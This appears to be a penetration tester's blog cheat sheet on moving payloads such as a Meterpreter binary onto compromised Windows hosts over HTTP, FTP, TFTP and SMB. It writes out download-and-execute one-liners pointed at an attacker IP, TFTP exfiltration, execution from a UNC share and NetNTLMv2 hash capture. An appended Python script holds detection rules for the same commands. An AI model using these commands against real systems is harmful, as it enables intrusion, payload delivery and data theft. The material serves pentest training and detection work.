Table of Contents

  • HTTP
  • FTP
  • TFTP
  • SMB
  • Summary

    Often times on an engagement I find myself needing to copy a tool or a payload from my Kali Linux attack box to a compromised Windows machine. As a perfect example, on a recent pentest, I found a vulnerable ColdFusion server and was able to upload a CFM webshell. It was a really limited, non-interactive shell and I wanted to download and execute a reverse Meterpreter binary from my attack machine. I generated the payload with Veil but needed a way to transfer the file to the Windows server running ColdFusion through simple commands.
    I'm putting this post together as a "cheat sheet" of sorts for my favorite ways to transfer files.
    For purposes of demonstration, the file I'll be copying over using all these methods is called met8888.exe and is located in /root/shells.

    HTTP

    Downloading files via HTTP is pretty straightforward if you have access to the desktop and can open up a web browser, but it's also possible to do it through the command line as well.

    Starting the Server

    The two ways I usually serve a file over HTTP from Kali are either through Apache or through a Python HTTP server.
    To serve a file up over Apache, just copy it to /var/www/html and enable the Apache service. Apache is installed by default in Kali.
    The other option is to just start a Python webserver directly inside the shells directory. This only requires a single line of Python thanks to Python's SimpleHTTPServer module:
    python -m SimpleHTTPServer
    By default it serves on port 8000, but you can also specify a port number at the end. (SimpleHTTPServer is the Python 2 module name; on Python 3 the equivalent is python3 -m http.server.)
    While this is running, all files within the current directory will be accessible over HTTP. Ctrl-C will kill the server when you're done.

    Downloading the files

    If you have desktop access, just browse to http://YOUR-KALI-IP/met8888.exe and use the browser to download the file.
    If you only have command line access (e.g. through a shell), downloading via HTTP is a little trickier as there's no built-in Windows equivalent to curl or wget. The best option is to use PowerShell's WebClient object:
    (new-object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\Users\jarrieta\Desktop\met8888.exe')
    You can call this from a normal Windows command prompt as well.
    There are a few other methods out there, but I don't think any of them are as straightforward as the PowerShell snippet above.

    FTP

    Another option to transfer files is FTP. Windows has a built-in FTP client at C:\Windows\System32\ftp.exe so this option should almost always work.

    Starting the Server

    You can definitely install a full-featured FTP server like vsftpd in Kali, but I find that's often overkill. I just want a simple, temporary FTP server that I can spin up and down to share files. The two best ways to do this are with Python or Metasploit.
    Python. The pyftpdlib library, like the HTTP one above, lets you spin up a Python FTP server in one line. It doesn't come installed by default, but you can install it with apt:
    apt-get install python-pyftpdlib
    Now from the directory you want to serve, just run the Python module. With no arguments it runs on port 2121 and accepts anonymous authentication; it can also be told to listen on the standard port 21 instead.
    One benefit of using FTP over HTTP is the ability to transfer files both ways. If you want to grant the anonymous user write access, add the -w flag as well.
    Metasploit. There is also an auxiliary FTP server built in to Metasploit as well that is easy to deploy and configure. It's located at auxiliary/server/ftp. Set the FTPROOT to the directory you want to share and run exploit.
    The server will run in the background. Kill it with jobs -k <id>.

    Downloading the files

    As mentioned earlier, Windows has an FTP client built in to the PATH. You can open an FTP connection and download the files directly from Kali on the command line. Authenticate with user anonymous and any password.
    Now this is great if you have an interactive shell where you can actually drop into the FTP prompt and issue commands, but it's not that useful if you just have command injection and can only issue one command at a time.
    Fortunately, Windows FTP can take a "script" of commands directly from the command line. Which means if we have a text file on the system that contains this:
    open 10.9.122.8
    anonymous
    whatever
    binary
    get met8888.exe
    bye
    we can just run ftp -s:ftp_commands.txt and we can download a file with no user interaction.
    How to get that text file? We can echo into it one line at a time:
    C:\Users\jarrieta\Desktop>echo open 10.9.122.8>ftp_commands.txt
    C:\Users\jarrieta\Desktop>echo anonymous>>ftp_commands.txt
    C:\Users\jarrieta\Desktop>echo whatever>>ftp_commands.txt
    C:\Users\jarrieta\Desktop>echo binary>>ftp_commands.txt
    C:\Users\jarrieta\Desktop>echo get met8888.exe>>ftp_commands.txt
    C:\Users\jarrieta\Desktop>echo bye>>ftp_commands.txt
    C:\Users\jarrieta\Desktop>ftp -s:ftp_commands.txt
    Or, do it all in one long line:
    C:\Users\jarrieta\Desktop>echo open 10.9.122.8>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get met8888.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt
    Either way you'll end up with met8888.exe on the Windows host.

    TFTP

    Trivial File Transfer Protocol is another possibility if tftp is installed on the system. It used to be installed by default in Windows XP, but now needs to be manually enabled on newer versions of Windows. If the Windows machine you have access to happens to have the tftp client installed, however, it can make a really convenient way to grab files in a single command.

    Starting the Server

    Kali comes with a TFTP server installed, atftpd, which can be started with a simple service atftpd start. I've always had a hell of a time getting it configured and working though, and I rarely need to start and keep running a TFTP server as a service, so I just use the simpler Metasploit module.
    Metasploit, like with FTP, has an auxiliary TFTP server module at auxiliary/server/tftp. Set the module options, including TFTPROOT, which determines which directory to serve up, and OUTPUTPATH if you want to capture TFTP uploads from Windows as well.

    Downloading the Files

    Again, assuming the tftp utility is installed, you can grab a file with one line from the Windows prompt. It doesn't require any authentication. Just use the -i flag (binary image transfer mode) and the GET action.
    Exfiltrating files via TFTP is simple as well with the PUT action. The Metasploit server saves them in /tmp by default.
    TFTP is a convenient, simple way to transfer files as it doesn't require authentication and you can do everything in a single command.
    Sidenote: Installing TFTP. As I mentioned, TFTP is not included by default on newer versions of Windows. If you really wanted to, you can actually enable TFTP from the command line:
    pkgmgr /iu:"TFTP"
    Might come in handy, but I'd always rather "live off the land" and use tools that are already available.

    SMB

    This is actually my favorite method to transfer a file to a Windows host. SMB is built in to Windows and doesn't require any special commands as Windows understands UNC paths. You can just use the standard copy and move commands and SMB handles the file transferring automatically for you. What's even better is Windows will actually let you execute files via UNC paths, meaning you can download and execute a payload in one command!

    Setting upwardly the Server

    Trying to get Samba set up and configured properly on Linux is a pain. You have to configure authentication, permissions, etc and it's quite frankly way overkill if I just want to download one file. Now Samba can actually do some really cool stuff when you configure it to play nicely with Windows AD, but most of the time I just want a super simple server up and running that accepts any authentication and serves up or accepts files.
    Enter smbserver.py, part of the Impacket project. Maybe one day I'll write a blogpost without mentioning Impacket, but that day is not today.
    To launch a simple SMB server on port 445, just specify a share name and the path you want to share:
    # python smbserver.py ROPNOP /root/shells
    The Python script takes care of all the configuration for you, binds to 445, and accepts any authentication. It will even print out the hashed challenge responses for any system that connects to it.
    In one line we've got an SMB share up and running. You can confirm it with smbclient from Linux, or with net view from Windows.

    Copying the Files

    Since Windows handles UNC paths, you can just treat the ROPNOP share as if it's just a local folder from Windows. Basic Windows file commands like dir, copy, move, etc all just work.
    If you look at the output from smbserver.py, you can see that every time we access the share it outputs the NetNTLMv2 hash from the current Windows user. You can feed these into John or Hashcat and crack them if you want (assuming you can't just elevate to System and get them from Mimikatz).
    Executing files from SMB. Because of the way Windows treats UNC paths, it's possible to just execute our binary directly from the SMB share without even needing to copy it over first. Just run the executable as if it were already local and the payload will fire.
    This proved incredibly useful during another ColdFusion exploit I came across. After gaining access to an unprotected ColdFusion admin panel, I was able to configure a "system probe" to fire when a check failed. It let me execute a program as a failure action, and I just used a UNC path to execute a Meterpreter payload hosted from my Kali machine.
    When the probe failed, ColdFusion connected to my SMB share and executed the payload and I was off and running.
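    Seen from the defender's side, every Windows-side one-liner in the HTTP, FTP, TFTP and SMB sections above lands in process-creation telemetry (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled), and the image path of a process started straight off a share is itself a UNC path. The script below is an added example, not code from ropnop's post: it runs a handful of detection rules over constructed (image, command line) pairs that reuse the post's sample host 10.9.122.8, the ROPNOP share and met8888.exe purely as test input. The rule names, the Finding class and the helper functions are this example's own.

```python
"""Flag process-creation events that match the Windows-side transfer commands
described above: WebClient downloads, scripted ftp.exe sessions, tftp.exe
GET/PUT, copy from a UNC path, and execution directly from a UNC path.

Input is a list of (image, command_line) pairs, the two fields a defender gets
from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing.
Every sample event below is constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Each rule is (name, regex over the command line). The lookbehind keeps "ftp"
# from matching inside "sftp" or "ftp_commands.txt" while still matching
# "&ftp -s:..." at the end of a chained one-liner.
RULES = [
    ("powershell_webclient_download",
     re.compile(r"(?i)system\.net\.webclient.*\.download(?:file|string)")),
    ("ftp_scripted_session",
     re.compile(r"(?i)(?<![\w.-])ftp(?:\.exe)?\s+[^\n]*-s:\S+")),
    ("ftp_script_built_with_echo",
     re.compile(r"(?i)echo\s+open\s+\S+\s*>")),
    ("tftp_binary_transfer",
     re.compile(r"(?i)(?<![\w.-])tftp(?:\.exe)?\s+[^\n]*-i\s+\S+\s+(?:get|put)\s")),
    ("copy_from_unc_path",
     re.compile(r"(?i)\b(?:copy|move|xcopy|robocopy)\s+[^\n]*\\\\[^\\\s]+\\[^\\\s]+")),
]
# The new process's own image lives on a share: it was run straight off SMB.
UNC_IMAGE = re.compile(r"^\\\\[^\\\s]+\\")

# Places the remote peer is named in the command line, tried in this order.
HOST_PATTERNS = [
    re.compile(r"(?i)https?://([^/'\"\s:]+)"),                        # http://HOST/...
    re.compile(r"(?i)(?<![\w.-])tftp(?:\.exe)?\s+(?:-i\s+)?(\S+)"),    # tftp -i HOST
    re.compile(r"(?i)\bopen\s+(\S+?)\s*>"),                            # echo open HOST>file
    re.compile(r"\\\\([^\\\s]+)\\"),                                   # \\HOST\share
]


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    command_line: str
    remote_host: Optional[str]


def remote_host(command_line: str) -> Optional[str]:
    """Best-effort extraction of the peer the command talks to, or None
    (e.g. for ftp -s:file the host is inside the script file, not the command)."""
    for pattern in HOST_PATTERNS:
        match = pattern.search(command_line)
        if match:
            return match.group(1)
    return None


def scan_event(image: str, command_line: str) -> List[Finding]:
    """Return one Finding per rule the event matches; empty for benign events."""
    hits = [name for name, pattern in RULES if pattern.search(command_line)]
    if UNC_IMAGE.match(image):
        hits.append("executed_from_unc_path")
    host = remote_host(command_line) if hits else None
    return [Finding(rule, image, command_line, host) for rule in hits]


def scan_events(events: Iterable[Tuple[str, str]]) -> List[Finding]:
    findings: List[Finding] = []
    for image, command_line in events:
        findings.extend(scan_event(image, command_line))
    return findings


# Constructed sample events; 10.9.122.8, ROPNOP and met8888.exe are the values
# used in the post above, not real telemetry.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell (new-object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\\Users\\jarrieta\\Desktop\\met8888.exe')"),
    (r"C:\Windows\System32\ftp.exe", "ftp -s:ftp_commands.txt"),
    (r"C:\Windows\System32\cmd.exe",
     "cmd /c echo open 10.9.122.8>ftp_commands.txt&echo anonymous>>ftp_commands.txt"
     "&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt"),
    (r"C:\Windows\System32\tftp.exe", "tftp -i 10.9.122.8 GET met8888.exe"),
    (r"C:\Windows\System32\cmd.exe",
     r"cmd /c copy \\10.9.122.8\ROPNOP\met8888.exe C:\Users\jarrieta\Desktop"),
    (r"\\10.9.122.8\ROPNOP\met8888.exe", r"\\10.9.122.8\ROPNOP\met8888.exe"),
    (r"C:\Windows\System32\cmd.exe", r"cmd /c dir C:\Users\jarrieta"),  # benign
    (r"C:\Windows\System32\ftp.exe", "ftp"),  # interactive session, not scripted
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.rule:30} host={str(f.remote_host):12} {f.command_line[:60]}")
```

    Two things the output makes visible: the plain ftp -s:ftp_commands.txt event carries no host at all, so it has to be joined with the file-creation or echo events that wrote the script (the chained one-liner form trips both rules at once), and a UNC image path is the strongest single signal on the page, because nothing about the command line needs to look unusual for the payload to have come off a remote share. In practice these rules sit beside network controls: outbound 445, 69 and 21 from workstations to arbitrary hosts is rarely legitimate, and blocking it at the egress point removes three of the four channels described above.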

    Summary

    A good pentester needs to "live off the land" and know several different ways to transfer files. You can't always count on an interactive shell, let alone a GUI, so understanding different commands and techniques to transfer and execute payloads is crucial.
    I outlined a few different techniques using 4 different protocols:
    • HTTP
    • FTP
    • TFTP
    • SMB
    Their usage depends on what's available on the target and what's allowed on the network.
    Hope this post helps someone and can serve as a "cheat sheet" of sorts. Let me know if I missed any of your favorite techniques!
    -ropnop